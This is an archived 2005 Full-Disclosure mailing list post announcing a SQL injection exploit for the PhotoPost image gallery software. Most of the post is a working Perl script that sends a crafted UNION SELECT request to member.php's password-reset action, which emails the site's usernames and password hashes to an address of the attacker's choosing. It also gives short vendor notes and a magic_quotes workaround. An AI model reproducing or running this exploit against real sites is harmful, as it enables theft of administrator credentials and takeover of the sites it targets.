lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050513095732.8588A23EF70@ws5-4.us4.outblaze.com>
Date: Fri May 13 12:31:22 2005
From: basher13 at linuxmail.org (eric basher)
Subject: PhotoPost Arbitrary Data Exploit

Update:
2:41 PM 5/11/2005



Subject:
" PhotoPost Arbitrary Data Exploit "




Description:
PhotoPost is a popular commercial image publishing software.
Everyone loves showing off their photos! Add PhotoPost to your site, 
or let us install it for you,and your visitors will be able to upload 
their photos to galleries on your site and interact in photo
discussions. Join the 3,500+ sites that are already using 
PhotoPost and add a fun new dimension to your website.




Vulnerability:
PhotoPost (further on - PP) is built on a highly risky principle
of filtering input data, based on magic_quotes:

magic_quotes_gpc boolean
Sets the magic_quotes state for GPC (Get/Post/Cookie) operations.
When magic_quotes are on, all ' (single-quote), " (double quote), \ (backslash) 
and NUL's are escaped with a backslash automatically.

Turning magic_quotes on is neglected by a large percentage of PP users.
It is a good idea not to rely on user interaction in the essential matter of
data filtering and write nested procedures based on on the mysql_escape_string/
mysql_real_escape_string functions instead. Adding a few native strings of code 
would have definitely fixed that "human" factor.
Many users do not have any idea what magic_quotes is and
what it is for and what their negligence will lead them to, even despite a
warning PP gives while installing. If one were to
look into architecture PP is assembled upon, it would become clear
that PP should even not attempt to install itself on systems with
magic_quotes turned off.



Exploit:
#!/usr/bin/perl
# PhotoPost Arbitrary Data Exploit
# --------------------------------
# INFPG - Hacking&Security Research
#
#
# Use first the exploit code,then You'll get admin MD5 hash and user name on your mail.
#
# Greats: Infam0us Gr0up team/crew/fans,Zone-H,securiteam,str0ke-milw0rm,addict3d,
# Thomas-secunia,Yudha,Dcrab's,Kavling Community,1st Indonesian Security,
# Jasakom,ECHO,etc..betst reagrds t0 whell.
# Info: www.98.to/infamous
#

use IO::Socket;

if (@ARGV < 3)
 {
system "clear";
print "PhotoPost Arbitrary Data Exploit\n";
print "\n-------------------------------\n";
print "\nINFGP-Hacking&Security Research\n";
print "\n\n";
print "[?]Usage: perl $0 [host] [path] [mail] \n";
exit(1);
}

system "clear";

$server = $ARGV[0];
$folder = @ARGV[1];
$mail = @ARGV[2];

print "Connecting to host ...\n";
$socket = IO::Socket::INET->new(
	Proto => "tcp",
	PeerAddr => "$ARGV[0]",
	PeerPort => "80"); unless ($socket) 
{ 
  die "Server is offline\n" 
}

print "[+]Connected\n\n";
print "[+]Building string core..\n";

$stringcore = 'member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0",$mail
,%20concat(username,"%20",%20password)%20from%20users';

print "Sent 0day..\n\n";
print $socket "GET /$folder/$stringcore HTTP/1.0\r\n\r\n"; 
print "Server Exploited\n";
print "You should check $mail now";
close($socket);




Solution:
Vendor was contacted.Upgrade the version to lastest update.
set .htaccess php_value magic_quotes_gpc 1




Security Audit Tools:
http://user.7host.com/stardawn/files/photopost.zip




Vendor URL:
http://www.photopost.com/



Credits:
Bug Found by - Diabolic Crab[http://icis.digitalparadox.org/~dcrab]
Published by - basher13[basher13@...uxmail.org]


-- 
_______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.

Powered by Outblaze

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ